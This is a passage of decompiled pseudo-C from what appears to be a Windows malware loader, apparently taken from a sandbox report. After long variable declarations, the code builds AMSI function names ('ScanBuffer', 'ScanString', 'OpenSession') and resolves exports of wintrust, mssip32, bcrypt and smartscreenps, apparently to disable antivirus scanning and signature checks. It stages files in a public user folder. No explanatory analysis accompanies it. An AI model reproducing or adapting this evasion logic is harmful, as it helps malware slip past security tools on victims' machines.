				char _v1844;
				char _v1848;
				intOrPtr _v1852;
				char _v1856;
				char _v1860;
				char _v1864;
				intOrPtr _v1868;
				char _v1872;
				char _v1876;
				char _v1880;
				char _v1884;
				char _v1888;
				char _v1892;
				intOrPtr _v1896;
				char _v1900;
				char _v1904;
				char _v1908;
				intOrPtr _v1912;
				char _v1916;
				char _v1920;
				char _v1924;
				intOrPtr _v1928;
				char _v1932;
				char _v1936;
				char _v1940;
				intOrPtr _v1944;
				char _v1948;
				char _v1952;
				char _v1956;
				intOrPtr _v1960;
				char _v1964;
				char _v1968;
				char _v1972;
				intOrPtr _v1976;
				char _v1980;
				char _v1984;
				char _v1988;
				intOrPtr _v1992;
				char _v1996;
				char _v2000;
				char _v2004;
				intOrPtr _v2008;
				char _v2012;
				char _v2016;
				void* _v2020;
				char _v2024;
				char _v2028;
				char _v2032;
				intOrPtr _v2036;
				char _v2040;
				char _v2044;
				char _v2048;
				intOrPtr _v2052;
				char _v2056;
				char _v2060;
				char _v2064;
				char _v2068;
				char _v2072;
				intOrPtr _v2076;
				char _v2080;
				char _v2084;
				char _v2088;
				intOrPtr _v2092;
				char _v2096;
				char _v2100;
				char _v2104;
				intOrPtr _v2108;
				char _v2156;
				char _v2160;
				char _v2172;
				char _v2204;
				intOrPtr _v2208;
				char _v2212;
				char _v2216;
				char _v2220;
				intOrPtr _v2224;
				char _v2228;
				char _v2232;
				char _v2236;
				char _v2240;
				intOrPtr _v2244;
				char _v2248;
				char _v2252;
				char _v2256;
				intOrPtr _v2260;
				char _v2264;
				char _v2268;
				char _v2272;
				intOrPtr _v2276;
				char _v2280;
				char _v2284;
				char _v2288;
				char _v2292;
				intOrPtr _v2296;
				char _v2300;
				char _v2304;
				char _v2308;
				intOrPtr _v2312;
				char _v2316;
				char _v2320;
				char _v2324;
				intOrPtr _v2328;
				char _v2332;
				char _v2336;
				char _v2340;
				char _v2344;
				char _v2348;
				intOrPtr _v2352;
				char _v2356;
				char _v2360;
				char _v2364;
				intOrPtr _v2368;
				char _v2372;
				char _v2376;
				char _v2380;
				intOrPtr _v2384;
				char _v2388;
				char _v2392;
				char _v2396;
				intOrPtr _v2400;
				char _v2404;
				intOrPtr _v2408;
				char _v2412;
				char _v2416;
				char _v2420;
				char _v2424;
				intOrPtr _v2428;
				char _v2432;
				char _v2436;
				char _v2440;
				intOrPtr _v2444;
				char _v2448;
				char _v2452;
				char _v2456;
				intOrPtr _v2460;
				char _v2464;
				char _v2468;
				char _v2472;
				char _v2476;
				intOrPtr _v2480;
				char _v2484;
				char _v2488;
				char _v2492;
				intOrPtr _v2496;
				char _v2548;
				char _v2552;
				char _v2556;
				char _v2560;
				char _v2568;
				char _v2576;
				char _v2664;
				char _v2668;
				char _v2672;
				char _v2676;
				char _v2776;
				char _v2780;
				char _v2784;
				char _v2788;
				char _v2940;
				char _v2944;
				char _v2948;
				char _v2952;
				char _v2968;
				char _v3084;
				char _v3404;
				char _v3428;
				char _v3460;
				char _v3472;
				char _v3476;
				intOrPtr _v3480;
				char _v3484;
				char _v3488;
				char _v3492;
				intOrPtr _v3496;
				char _v3500;
				char _v3504;
				char _v3508;
				intOrPtr _v3512;
				char _v3516;
				char _v3520;
				char _v3524;
				intOrPtr _v3528;
				char _v3532;
				char _v3536;
				char _v3540;
				intOrPtr _v3544;
				char _v3548;
				char _v3552;
				char _v3556;
				intOrPtr _v3560;
				char _v3564;
				char _v3568;
				char _v3572;
				intOrPtr _v3576;
				char _v3580;
				char _v3584;
				char _v3588;
				char _v3592;
				intOrPtr _v3596;
				char _v3600;
				char _v3604;
				char _v3608;
				char _v3612;
				intOrPtr _v3616;
				char _v3620;
				char _v3624;
				char _v3628;
				intOrPtr _v3632;
				char _v3636;
				char _v3640;
				char _v3644;
				intOrPtr _v3648;
				char _v3652;
				char _v3656;
				char _v3660;
				intOrPtr _v3664;
				char _v3668;
				char _v3672;
				char _v3676;
				intOrPtr _v3680;
				char _v3684;
				char _v3688;
				char _v3692;
				intOrPtr _v3696;
				char _v3700;
				char _v3704;
				char _v3708;
				intOrPtr _v3712;
				char _v3716;
				char _v3720;
				char _v3724;
				intOrPtr _v3728;
				char _v3732;
				char _v3736;
				char _v3740;
				intOrPtr _v3744;
				char _v3748;
				char _v3752;
				char _v3756;
				intOrPtr _v3760;
				char _v3764;
				char _v3768;
				char _v3772;
				intOrPtr _v3776;
				char _v3780;
				char _v3784;
				char _v3820;
				intOrPtr _v3824;
				char _v3828;
				char _v3832;
				char _v3836;
				intOrPtr _v3840;
				char _v3844;
				char _v3848;
				char _v3852;
				intOrPtr _v3856;
				char _v3860;
				char _v3864;
				char _v3868;
				intOrPtr _v3872;
				char _v3876;
				char _v3880;
				char _v3884;
				intOrPtr _v3888;
				char _v3892;
				char _v3896;
				char _v3900;
				intOrPtr _v3904;
				char _v3908;
				char _v3912;
				char _v3916;
				intOrPtr _v3920;
				char _v3924;
				char _v3928;
				char _v3932;
				intOrPtr _v3936;
				char _v3940;
				char _v3944;
				char _v3948;
				intOrPtr _v3952;
				char _v3956;
				char _v3960;
				char _v3964;
				char _v3968;
				char _v3972;
				intOrPtr _v3976;
				char _v3980;
				char _v3984;
				char _v3988;
				intOrPtr _v3992;
				char _v3996;
				char _v4000;
				char _v4004;
				intOrPtr _v4008;
				char _v4012;
				char _v4016;
				char _v4020;
				char _v4024;
				char _v4028;
				char _v4032;
				char _v4036;
				intOrPtr _v4040;
				char _v4044;
				char _v4048;
				char _v4052;
				intOrPtr _v4056;
				char _v4060;
				char _v4064;
				char _v4068;
				intOrPtr _v4072;
				char _v4076;
				char _v4080;
				char _v4084;
				intOrPtr _v4088;
				char _v4092;
				char _v4096;
				char _v4100;
				intOrPtr _v4104;
				char _v4108;
				char _v4112;
				char _v4116;
				intOrPtr _v4120;
				char _v4124;
				char _v4128;
				char _v4132;
				intOrPtr _v4136;
				char _v4140;
				char _v4144;
				char _v4148;
				intOrPtr _v4152;
				char _v4156;
				char _v4160;
				char _v4164;
				intOrPtr _v4168;
				char _v4172;
				char _v4176;
				char _v4180;
				intOrPtr _v4184;
				char _v4188;
				char _v4192;
				intOrPtr _v4196;
				char _v4200;
				char _v4204;
				intOrPtr _v4208;
				char _v4212;
				char _v4216;
				char _v4220;
				intOrPtr _v4224;
				char _v4228;
				char _v4232;
				char _v4236;
				intOrPtr _v4240;
				char _v4244;
				char _v4248;
				char _v4252;
				intOrPtr _v4256;
				char _v4260;
				char _v4264;
				char _v4268;
				intOrPtr _v4272;
				char _v4276;
				char _v4280;
				char _v4284;
				char _v4288;
				intOrPtr _v4292;
				char _v4296;
				char _v4300;
				char _v4304;
				intOrPtr _v4308;
				char _v4312;
				char _v4316;
				char _v4320;
				char _v4324;
				char _v4328;
				char _v4332;
				intOrPtr _v4336;
				char _v4340;
				char _v4344;
				char _v4348;
				intOrPtr _v4352;
				char _v4356;
				char _v4360;
				char _v4364;
				intOrPtr _v4368;
				char _v4372;
				char _v4376;
				char _v4380;
				intOrPtr _v4384;
				char _v4388;
				char _v4392;
				char _v4396;
				intOrPtr _v4400;
				char _v4404;
				char _v4408;
				char _v4412;
				intOrPtr _v4416;
				char _v4420;
				char _v4424;
				char _v4428;
				char _v4432;
				char _v4436;
				intOrPtr _v4440;
				char _v4444;
				char _v4448;
				char _v4452;
				intOrPtr _v4456;
				char _v4460;
				char _v4464;
				char _v4468;
				intOrPtr _v4472;
				char _v4476;
				char _v4480;
				char _v4484;
				char _v4488;
				char _v4492;
				char _v4496;
				char _v4500;
				char _v4504;
				char _v4508;
				char _v4512;
				char _v4516;
				char _v4520;
				char _v4524;
				char _v4528;
				char _v4532;
				char _v4536;
				char _v4540;
				char _v4544;
				char _v4548;
				char _v4552;
				char _v4556;
				intOrPtr _v4560;
				char _v4564;
				char _v4568;
				char _v4572;
				intOrPtr _v4576;
				char _v4580;
				char _v4584;
				char _v4588;
				intOrPtr _v4592;
				char _v4596;
				char _v4600;
				char _v4604;
				char _v4608;
				char _v4612;
				char _v4616;
				char _v4620;
				char _v4624;
				char _v4628;
				char _v4632;
				char _v4636;
				char _v4640;
				char _v4644;
				char _v4648;
				char _v4652;
				char _v4656;
				char _v4660;
				char _v4664;
				char _v4668;
				char _v4672;
				char _v4676;
				char _v4680;
				char _v4684;
				char _v4688;
				char _v4692;
				char _v4696;
				char _v4700;
				char _v4704;
				char _v4708;
				char _v4712;
				char _v4716;
				char _v4720;
				char _v4724;
				char _v4728;
				char _v4732;
				char _v4736;
				char _v4740;
				char _v4744;
				char _v4748;
				char _v4752;
				char _v4756;
				char _v4760;
				char _v4764;
				char _v4768;
				char _v4772;
				char _v4776;
				char _v4780;
				intOrPtr _v4784;
				char _v4788;
				char _v4792;
				char _v4796;
				intOrPtr _v4800;
				char _v4804;
				char _v4808;
				char _v4812;
				intOrPtr _v4816;
				char _v4820;
				char _v4824;
				void* _t2163;
				void* _t2289;
				void* _t2447;
				_Unknown_base(*)()* _t2477;
				void* _t2912;
				_Unknown_base(*)()* _t3812;
				_Unknown_base(*)()* _t3979;
				_Unknown_base(*)()* _t4435;
				_Unknown_base(*)()* _t4453;
				void* _t4535;
				_Unknown_base(*)()* _t5093;
				_Unknown_base(*)()* _t5273;
				_Unknown_base(*)()* _t5334;
				void* _t5448;
				_Unknown_base(*)()* _t5539;
				_Unknown_base(*)()* _t5540;
				void* _t5542;
				intOrPtr _t5566;
				intOrPtr _t5590;
				_Unknown_base(*)()* _t5691;
				_Unknown_base(*)()* _t5702;
				void* _t5792;
				void* _t5797;
				void* _t5802;
				void* _t5805;
				void* _t5808;
				void* _t5811;
				void* _t5814;
				void* _t5817;
				void* _t5820;
				void* _t5823;
				void* _t5826;
				void* _t5829;
				void* _t5832;
				void* _t5835;
				void* _t5838;
				void* _t5843;
				void* _t5848;
				void* _t5853;
				void* _t5858;
				void* _t5865;
				void* _t5871;
				void* _t5879;
				void* _t5884;
				void* _t5889;
				void* _t5894;
				void* _t5900;
				void* _t5905;
				void* _t5910;
				void* _t5916;
				void* _t5922;
				void* _t5927;
				void* _t5935;
				void* _t5940;
				void* _t5947;
				void* _t5952;
				void* _t5957;
				void* _t5966;
				void* _t5971;
				void* _t5976;
				void* _t5981;
				intOrPtr _t5982;
				intOrPtr _t6009;
				intOrPtr _t6018;
				void* _t6030;
				void* _t6035;
				void* _t6040;
				void* _t6045;
				void* _t6052;
				void* _t6057;
				void* _t6062;
				void* _t6067;
				void* _t6074;
				void* _t6079;
				void* _t6084;
				void* _t6089;
				intOrPtr _t6090;
				void* _t6097;
				void* _t6102;
				void* _t6107;
				void* _t6112;
				void* _t6141;
				void* _t6146;
				void* _t6152;
				void* _t6157;
				void* _t6163;
				void* _t6168;
				void* _t6173;
				void* _t6178;
				void* _t6184;
				void* _t6189;
				void* _t6196;
				void* _t6201;
				void* _t6206;
				void* _t6213;
				void* _t6218;
				void* _t6223;
				void* _t6231;
				void* _t6236;
				void* _t6241;
				void* _t6247;
				void* _t6252;
				void* _t6257;
				void* _t6263;
				void* _t6268;
				void* _t6273;
				void* _t6278;
				void* _t6283;
				void* _t6288;
				void* _t6295;
				void* _t6300;
				void* _t6305;
				void* _t6308;
				void* _t6313;
				void* _t6318;
				void* _t6323;
				void* _t6326;
				void* _t6329;
				void* _t6332;
				void* _t6335;
				void* _t6338;
				void* _t6341;
				void* _t6344;
				void* _t6347;
				void* _t6350;
				void* _t6371;
				void* _t6376;
				void* _t6381;
				void* _t6384;
				void* _t6387;
				void* _t6390;
				void* _t6393;
				void* _t6396;
				void* _t6399;
				void* _t6402;
				void* _t6405;
				void* _t6408;
				void* _t6411;
				void* _t6414;
				void* _t6417;
				void* _t6420;
				void* _t6423;
				void* _t6426;
				void* _t6429;
				void* _t6432;
				void* _t6435;
				void* _t6438;
				void* _t6441;
				void* _t6444;
				void* _t6447;
				void* _t6452;
				void* _t6457;
				void* _t6462;
				void* _t6468;
				void* _t6473;
				void* _t6481;
				void* _t6486;
				void* _t6491;
				void* _t6496;
				void* _t6501;
				void* _t6506;
				void* _t6512;
				void* _t6517;
				void* _t6524;
				void* _t6529;
				void* _t6533;
				void* _t6538;
				void* _t6543;
				void* _t6548;
				void* _t6555;
				void* _t6560;
				void* _t6566;
				void* _t6571;
				void* _t6577;
				void* _t6582;
				void* _t6587;
				void* _t6592;
				void* _t6597;
				void* _t6602;
				void* _t6615;
				void* _t6620;
				void* _t6625;
				void* _t6630;
				void* _t6635;
				void* _t6640;
				void* _t6646;
				void* _t6653;
				void* _t6658;
				void* _t6663;
				void* _t6668;
				void* _t6675;
				void* _t6680;
				void* _t6685;
				void* _t6690;
				void* _t6697;
				void* _t6702;
				void* _t6707;
				intOrPtr _t6708;
				void* _t6715;
				void* _t6721;
				void* _t6726;
				void* _t6731;
				void* _t6739;
				intOrPtr _t6743;
				void* _t6750;
				void* _t6755;
				void* _t6760;
				void* _t6767;
				void* _t6772;
				void* _t6777;
				void* _t6782;
				void* _t6787;
				void* _t6794;
				void* _t6799;
				void* _t6804;
				void* _t6809;
				void* _t6814;
				void* _t6818;
				void* _t6823;
				void* _t6828;
				void* _t6833;
				void* _t6838;
				void* _t6843;
				void* _t6848;
				void* _t6854;
				void* _t6859;
				void* _t6870;
				void* _t6875;
				void* _t6883;
				void* _t6888;
				intOrPtr _t6892;
				void* _t6897;
				void* _t6902;
				void* _t6908;
				void* _t6913;
				void* _t6920;
				void* _t6925;
				void* _t6930;
				void* _t6935;
				void* _t6940;
				void* _t6945;
				void* _t6951;
				void* _t6956;
				void* _t6961;
				void* _t6966;
				void* _t6973;
				void* _t6978;
				void* _t6983;
				void* _t6988;
				void* _t6993;
				void* _t6998;
				void* _t7004;
				void* _t7009;
				void* _t7014;
				void* _t7019;
				void* _t7024;
				void* _t7029;
				void* _t7036;
				void* _t7041;
				void* _t7046;
				void* _t7051;
				void* _t7056;
				void* _t7061;
				void* _t7066;
				void* _t7071;
				void* _t7076;
				void* _t7081;
				void* _t7086;
				void* _t7091;
				void* _t7096;
				void* _t7101;
				void* _t7104;
				void* _t7105;
				intOrPtr _t7107;
				intOrPtr _t7108;
				void* _t7122;
				void* _t7125;

				_t7125 = __fp0;
				_t7105 = __esi;
				_t7104 = __edi;
				_t7107 = _t7108;
				_t5542 = 0x25a;
				do {
					_push(0);
					_push(0);
					_t5542 = _t5542 - 1;
				} while (_t5542 != 0);
				_push(_t5542);
				_push(__ebx);
				_push(_t7107);
				_push(0x3286a6b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t7108;
				_push(0x8ae); // executed
				L03277B0C(); // executed
				if(0 == 0) {
					E032644F4(0x33928a8, 0x3286a94);
				} else {
					E032644F4(0x33928a8, 0x3286a84);
				}
				_push(0x3286aa0);
				_push( *0x33928a8);
				_push("ScanString");
				E03264824();
				E03264698( &_v8, E03264964(_v12));
				_push(_v8);
				E032647B0( &_v20,  *0x33928a8, 0x3286aa0);
				E03264698( &_v16, E03264964(_v20));
				_pop(_t5792); // executed
				E03277C04(_v16,  *0x33928a8, _t5792, 0); // executed
				_push(0x3286aa0);
				_push( *0x33928a8);
				_push("OpenSession");
				E03264824();
				E03264698( &_v24, E03264964(_v28));
				_push(_v24);
				E032647B0( &_v36,  *0x33928a8, 0x3286aa0);
				E03264698( &_v32, E03264964(_v36));
				_pop(_t5797); // executed
				E03277C04(_v32,  *0x33928a8, _t5797, 0); // executed
				_push(0x3286aa0);
				_push( *0x33928a8);
				_push("ScanBuffer");
				E03264824();
				E03264698( &_v40, E03264964(_v44));
				_push(_v40);
				_t5545 =  *0x33928a8;
				E032647B0( &_v52,  *0x33928a8, 0x3286aa0);
				E03264698( &_v48, E03264964(_v52));
				_pop(_t5802); // executed
				E03277C04(_v48,  *0x33928a8, _t5802, 0); // executed
				E03264698( &_v56, "TrustOpenStores");
				_push(_v56);
				E03264698( &_v60, "wintrust");
				_pop(_t5805); // executed
				E03277C04(_v60,  *0x33928a8, _t5805, 0); // executed
				E03264698( &_v64, "WintrustAddActionID");
				_push(_v64);
				E03264698( &_v68, "wintrust");
				_pop(_t5808); // executed
				E03277C04(_v68,  *0x33928a8, _t5808, 0); // executed
				E03264698( &_v72, "FindCertsByIssuer");
				_push(_v72);
				E03264698( &_v76, "wintrust");
				_pop(_t5811); // executed
				E03277C04(_v76,  *0x33928a8, _t5811, 0); // executed
				E03264698( &_v80, "CryptSIPGetInfo");
				_push(_v80);
				E03264698( &_v84, "mssip32");
				_pop(_t5814); // executed
				E03277C04(_v84, _t5545, _t5814, 0); // executed
				E03264698( &_v88, "CryptSIPVerifyIndirectData");
				_push(_v88);
				E03264698( &_v92, "mssip32");
				_pop(_t5817); // executed
				E03277C04(_v92, _t5545, _t5817, 0); // executed
				E03264698( &_v96, "CryptSIPGetSignedDataMsg");
				_push(_v96);
				E03264698( &_v100, "mssip32");
				_pop(_t5820); // executed
				E03277C04(_v100, _t5545, _t5820, 0); // executed
				E03264698( &_v104, "BCryptVerifySignature");
				_push(_v104);
				E03264698( &_v108, "bcrypt");
				_pop(_t5823); // executed
				E03277C04(_v108, _t5545, _t5823, 0); // executed
				E03264698( &_v112, "BCryptQueryProviderRegistration");
				_push(_v112);
				E03264698( &_v116, "bcrypt");
				_pop(_t5826); // executed
				E03277C04(_v116, _t5545, _t5826, 0); // executed
				E03264698( &_v120, "BCryptRegisterProvider");
				_push(_v120);
				E03264698( &_v124, "bcrypt");
				_pop(_t5829);
				E03277C04(_v124, _t5545, _t5829, 0);
				E03264698( &_v128, "DllGetClassObject");
				_push(_v128);
				E03264698( &_v132, "smartscreenps");
				_pop(_t5832); // executed
				E03277C04(_v132, _t5545, _t5832, 0); // executed
				E03264698( &_v136, "DllGetActivationFactory");
				_push(_v136);
				E03264698( &_v140, "smartscreenps");
				_pop(_t5835); // executed
				E03277C04(_v140, _t5545, _t5835, 0); // executed
				E03264698( &_v144, "DllRegisterServer");
				_push(_v144);
				E03264698( &_v148, "smartscreenps");
				_pop(_t5838); // executed
				E03277C04(_v148, _t5545, _t5838, 0); // executed
				E03262EE0();
				_push(0x3286aa0);
				_push( *0x33928a8);
				_push("Initialize");
				E03264824();
				E03264698( &_v152, E03264964(_v156));
				_push(_v152);
				E032647B0( &_v164,  *0x33928a8, 0x3286aa0);
				E03264698( &_v160, E03264964(_v164));
				_pop(_t5843); // executed
				E03277C04(_v160,  *0x33928a8, _t5843, 0); // executed
				_push(0x3286aa0);
				_push( *0x33928a8);
				_push("UacScan");
				E03264824();
				E03264698( &_v168, E03264964(_v172));
				_push(_v168);
				E032647B0( &_v180,  *0x33928a8, 0x3286aa0);
				E03264698( &_v176, E03264964(_v180));
				_pop(_t5848); // executed
				E03277C04(_v176,  *0x33928a8, _t5848, 0); // executed
				_push(0x3286aa0);
				_push( *0x33928a8);
				_push("UacInitialize");
				E03264824();
				E03264698( &_v184, E03264964(_v188));
				_push(_v184);
				E032647B0( &_v196,  *0x33928a8, 0x3286aa0);
				E03264698( &_v192, E03264964(_v196));
				_pop(_t5853); // executed
				E03277C04(_v192,  *0x33928a8, _t5853, 0); // executed
				_push(0x3286aa0);
				_push( *0x33928a8);
				_push("ScanBuffer");
				E03264824();
				E03264698( &_v200, E03264964(_v204));
				_push(_v200);
				E032647B0( &_v212,  *0x33928a8, 0x3286aa0);
				E03264698( &_v208, E03264964(_v212));
				_pop(_t5858); // executed
				E03277C04(_v208,  *0x33928a8, _t5858, 0); // executed
				E03264698(0x3392844, E03264964( *((intOrPtr*)(0x3289ad4 + E03277CF8(1, 3) * 4))));
				_push(0x3286aa0);
				_push( *0x33928a8);
				_push("ScanString");
				E03264824();
				E03264698( &_v216, E03264964(_v220));
				_push(_v216);
				E032647B0( &_v228,  *0x33928a8, 0x3286aa0);
				E03264698( &_v224, E03264964(_v228));
				_pop(_t5865); // executed
				E03277C04(_v224,  *0x33928a8, _t5865, 0); // executed
				E032647B0( &_v232,  *0x3392844, "C:\\Windows\\System32\\");
				_t2163 = E03267E40(_v232);
				_t7113 = _t2163;
				if(_t2163 == 0) {
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("ScanString");
					E03264824();
					E03264698( &_v252, E03264964(_v256));
					_push(_v252);
					E032647B0( &_v264,  *0x33928a8, 0x3286aa0);
					E03264698( &_v260, E03264964(_v264));
					_pop(_t5871);
					E03277C04(_v260,  *0x33928a8, _t5871, __eflags);
					E032644F4(0x3392820, "iexpress.exe");
				} else {
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("ScanString");
					E03264824();
					E03264698( &_v236, E03264964(_v240));
					_push(_v236);
					E032647B0( &_v248,  *0x33928a8, 0x3286aa0);
					E03264698( &_v244, E03264964(_v248));
					_pop(_t7101); // executed
					E03277C04(_v244,  *0x33928a8, _t7101, _t7113); // executed
					E032644F4(0x3392820,  *0x3392844);
				}
				E0326C348(0,  &_v268);
				E032644F4(0x3392800, _v268);
				_push(0x3286aa0);
				_push( *0x33928a8);
				_push("UacScan");
				E03264824();
				E03264698( &_v272, E03264964(_v276));
				_push(_v272);
				E032647B0( &_v284,  *0x33928a8, 0x3286aa0);
				E03264698( &_v280, E03264964(_v284));
				_pop(_t5879); // executed
				E03277C04(_v280,  *0x33928a8, _t5879, _t7113); // executed
				_push(0x3286aa0);
				_push( *0x33928a8);
				_push("Initialize");
				E03264824();
				E03264698( &_v288, E03264964(_v292));
				_push(_v288);
				E032647B0( &_v300,  *0x33928a8, 0x3286aa0);
				E03264698( &_v296, E03264964(_v300));
				_pop(_t5884); // executed
				E03277C04(_v296,  *0x33928a8, _t5884, _t7113); // executed
				_push(0x3286aa0);
				_push( *0x33928a8);
				_push("UacInitialize");
				E03264824();
				E03264698( &_v304, E03264964(_v308));
				_push(_v304);
				E032647B0( &_v316,  *0x33928a8, 0x3286aa0);
				E03264698( &_v312, E03264964(_v316));
				_pop(_t5889); // executed
				E03277C04(_v312,  *0x33928a8, _t5889, _t7113); // executed
				_push(0x3286aa0);
				_push( *0x33928a8);
				_push("ScanString");
				E03264824();
				E03264698( &_v320, E03264964(_v324));
				_push(_v320);
				E032647B0( &_v332,  *0x33928a8, 0x3286aa0);
				E03264698( &_v328, E03264964(_v332));
				_pop(_t5894); // executed
				E03277C04(_v328,  *0x33928a8, _t5894, _t7113); // executed
				E032644F4(0x339287c, "C:\\Users\\Public\\Libraries");
				_push(0x3286aa0);
				_push( *0x33928a8);
				_push("Initialize");
				E03264824();
				E03264698( &_v336, E03264964(_v340));
				_push(_v336);
				E032647B0( &_v348,  *0x33928a8, 0x3286aa0);
				E03264698( &_v344, E03264964(_v348));
				_pop(_t5900); // executed
				E03277C04(_v344,  *0x33928a8, _t5900, _t7113); // executed
				_push(0x3286aa0);
				_push( *0x33928a8);
				_push("ScanBuffer");
				E03264824();
				E03264698( &_v352, E03264964(_v356));
				_push(_v352);
				E032647B0( &_v364,  *0x33928a8, 0x3286aa0);
				E03264698( &_v360, E03264964(_v364));
				_pop(_t5905); // executed
				E03277C04(_v360,  *0x33928a8, _t5905, _t7113); // executed
				_push(0x3286aa0);
				_push( *0x33928a8);
				_push("OpenSession");
				E03264824();
				E03264698( &_v368, E03264964(_v372));
				_push(_v368);
				E032647B0( &_v380,  *0x33928a8, 0x3286aa0);
				E03264698( &_v376, E03264964(_v380));
				_pop(_t5910); // executed
				E03277C04(_v376,  *0x33928a8, _t5910, _t7113); // executed
				E03264698( &_v384, E03264964( *0x33927f0));
				_t2289 = E03267E40(_v384);
				_t7114 = _t2289;
				if(_t2289 == 0) {
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("UacScan");
					E03264824();
					E03264698( &_v596, E03264964(_v600));
					_push(_v596);
					E032647B0( &_v608,  *0x33928a8, 0x3286aa0);
					E03264698( &_v604, E03264964(_v608));
					_pop(_t5916); // executed
					E03277C04(_v604,  *0x33928a8, _t5916, __eflags); // executed
					E032644F4(0x3392898, 0x3286cbc);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("OpenSession");
					E03264824();
					E03264698( &_v612, E03264964(_v616));
					_push(_v612);
					E032647B0( &_v624,  *0x33928a8, 0x3286aa0);
					E03264698( &_v620, E03264964(_v624));
					_pop(_t5922); // executed
					E03277C04(_v620,  *0x33928a8, _t5922, __eflags); // executed
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("ScanBuffer");
					E03264824();
					E03264698( &_v628, E03264964(_v632));
					_push(_v628);
					E032647B0( &_v640,  *0x33928a8, 0x3286aa0);
					E03264698( &_v636, E03264964(_v640));
					_pop(_t5927); // executed
					E03277C04(_v636,  *0x33928a8, _t5927, __eflags); // executed
					E03264DA4( &_v648,  *0x3392800);
					E0327CBE8(_v648, 0x3392880,  &_v644, _t7105); // executed
					E032644F4(0x3392878, _v644);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("OpenSession");
					E03264824();
					E03264698( &_v652, E03264964(_v656));
					_push(_v652);
					E032647B0( &_v664,  *0x33928a8, 0x3286aa0);
					E03264698( &_v660, E03264964(_v664));
					_pop(_t5935); // executed
					E03277C04(_v660,  *0x33928a8, _t5935, __eflags); // executed
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("ScanString");
					E03264824();
					E03264698( &_v668, E03264964(_v672));
					_push(_v668);
					E032647B0( &_v680,  *0x33928a8, 0x3286aa0);
					E03264698( &_v676, E03264964(_v680));
					_pop(_t5940); // executed
					E03277C04(_v676,  *0x33928a8, _t5940, __eflags); // executed
					E0327CD4C( *0x3392878, 0x3392880,  &_v684, 0x3286cc8, _t7104, _t7105); // executed
					_t5566 =  *0x327ca10; // 0x327ca14
					E032657DC(0x3392880, _t5566, _v684);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("ScanBuffer");
					E03264824();
					E03264698( &_v688, E03264964(_v692));
					_push(_v688);
					E032647B0( &_v700,  *0x33928a8, 0x3286aa0);
					E03264698( &_v696, E03264964(_v700));
					_pop(_t5947); // executed
					E03277C04(_v696,  *0x33928a8, _t5947, __eflags); // executed
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("Initialize");
					E03264824();
					E03264698( &_v704, E03264964(_v708));
					_push(_v704);
					E032647B0( &_v716,  *0x33928a8, 0x3286aa0);
					E03264698( &_v712, E03264964(_v716));
					_pop(_t5952); // executed
					E03277C04(_v712,  *0x33928a8, _t5952, __eflags); // executed
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("ScanString");
					E03264824();
					E03264698( &_v720, E03264964(_v724));
					_push(_v720);
					E032647B0( &_v732,  *0x33928a8, 0x3286aa0);
					E03264698( &_v728, E03264964(_v732));
					_pop(_t5957); // executed
					E03277C04(_v728,  *0x33928a8, _t5957, __eflags); // executed
					E032644F4(0x3392814,  *((intOrPtr*)( *0x3392880 + 4)));
					E032644F4(0x3392838,  *((intOrPtr*)( *0x3392880 + 8)));
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("OpenSession");
					E03264824();
					E03264698( &_v736, E03264964(_v740));
					_push(_v736);
					E032647B0( &_v748,  *0x33928a8, 0x3286aa0);
					E03264698( &_v744, E03264964(_v748));
					_pop(_t5966); // executed
					E03277C04(_v744,  *0x33928a8, _t5966, __eflags); // executed
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("ScanBuffer");
					E03264824();
					E03264698( &_v752, E03264964(_v756));
					_push(_v752);
					E032647B0( &_v764,  *0x33928a8, 0x3286aa0);
					E03264698( &_v760, E03264964(_v764));
					_pop(_t5971); // executed
					E03277C04(_v760,  *0x33928a8, _t5971, __eflags); // executed
					_t2447 = E0327CCD4( *0x3392838, 0x3392880, _t5971, _t7104, _t7105, __eflags, _t7125);
					__eflags = _t2447 - 1;
					if(_t2447 == 1) {
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("Initialize");
						E03264824();
						E03264698( &_v768, E03264964(_v772));
						_push(_v768);
						E032647B0( &_v780,  *0x33928a8, 0x3286aa0);
						E03264698( &_v776, E03264964(_v780));
						_pop(_t6908); // executed
						E03277C04(_v776,  *0x33928a8, _t6908, __eflags); // executed
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("ScanString");
						E03264824();
						E03264698( &_v784, E03264964(_v788));
						_push(_v784);
						E032647B0( &_v796,  *0x33928a8, 0x3286aa0);
						E03264698( &_v792, E03264964(_v796));
						_pop(_t6913); // executed
						E03277C04(_v792,  *0x33928a8, _t6913, __eflags); // executed
						E0327D550( *0x3392814, 0x3392880,  &_v800, E03267AB0( *0x3392838, __eflags), _t7105);
						E032644F4(0x33928ac, _v800);
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("OpenSession");
						E03264824();
						E03264698( &_v804, E03264964(_v808));
						_push(_v804);
						E032647B0( &_v816,  *0x33928a8, 0x3286aa0);
						E03264698( &_v812, E03264964(_v816));
						_pop(_t6920); // executed
						E03277C04(_v812,  *0x33928a8, _t6920, __eflags); // executed
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("ScanBuffer");
						E03264824();
						E03264698( &_v820, E03264964(_v824));
						_push(_v820);
						E032647B0( &_v832,  *0x33928a8, 0x3286aa0);
						E03264698( &_v828, E03264964(_v832));
						_pop(_t6925); // executed
						E03277C04(_v828,  *0x33928a8, _t6925, __eflags); // executed
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("OpenSession");
						E03264824();
						E03264698( &_v836, E03264964(_v840));
						_push(_v836);
						E032647B0( &_v848,  *0x33928a8, 0x3286aa0);
						E03264698( &_v844, E03264964(_v848));
						_pop(_t6930); // executed
						E03277C04(_v844,  *0x33928a8, _t6930, __eflags); // executed
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("UacScan");
						E03264824();
						E03264698( &_v852, E03264964(_v856));
						_push(_v852);
						E032647B0( &_v864,  *0x33928a8, 0x3286aa0);
						E03264698( &_v860, E03264964(_v864));
